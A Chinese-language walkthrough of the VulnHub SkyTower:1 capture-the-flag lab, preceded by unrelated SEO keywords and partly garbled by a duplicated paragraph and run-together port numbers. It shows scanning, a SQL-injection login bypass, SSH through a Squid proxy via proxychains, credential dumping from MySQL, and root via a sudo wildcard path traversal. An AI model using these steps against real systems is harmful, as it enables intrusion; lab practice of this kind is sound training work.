网站+做内容分发资格,源码之家网站模板,宝安中心壹方城,网站一定要公司吗一、安装配置靶机
下载地址:
SkyTower: 1 ~ VulnHub
下载之后解压发现是VirtualBox格式的 我们下载一个VirtualBox#xff0c;这是官网
Downloads – Oracle VirtualBox
安装到默认路径就
打开后点击注册
选择解压后的vbox文件
然后点击左上角管理
点击导出虚拟电脑这是官网
Downloads – Oracle VirtualBox
安装到默认路径就
打开后点击注册
选择解压后的vbox文件
然后点击左上角管理
点击导出虚拟电脑选中后下一步更改路径然后一直下一步 就得到了一个镜像文件 用vmware打开
默认网卡模式为仅主机更改为NAT模式
C段扫描获得IP
arp-scan -l 端口扫描一下发现22803128
nmap 192.168.230.128 访问一下80端口
发现一个登录框 发现登录框我们测sql注入
邮箱随便输入一个密码我们输入
123 11#
登录成功发现账号密码 想到远程连接22端口 发现无效
想到3128端口尝试挂上代理连接
vim /etc/proxychains4.conf proxychains ssh john192.168.230.128 -t /bin/sh
登录成功 开始提权
sudo -l
发现没有可以提权的 想到了80端口界面存在sql注入
cat /var/www/login.php
发现数据库信息 登录成功
mysql -u root SkyTech -p 查看数据库信息
show databases 逐个查看找到
use SkyTech;
show tables; 得到账号密码
select * from login ssh登录
proxychains ssh sara192.168.230.128 -t /bin/sh sudo -l
得到/accounts/*有权限 pwd
发现在根目录下 sudo ls /accounts/../root 查看一下
sudo cat /accounts/../root/flag.txt
得到root密码 远程连接提权成功
proxychains ssh root192.168.230.128 -t /bin/sh
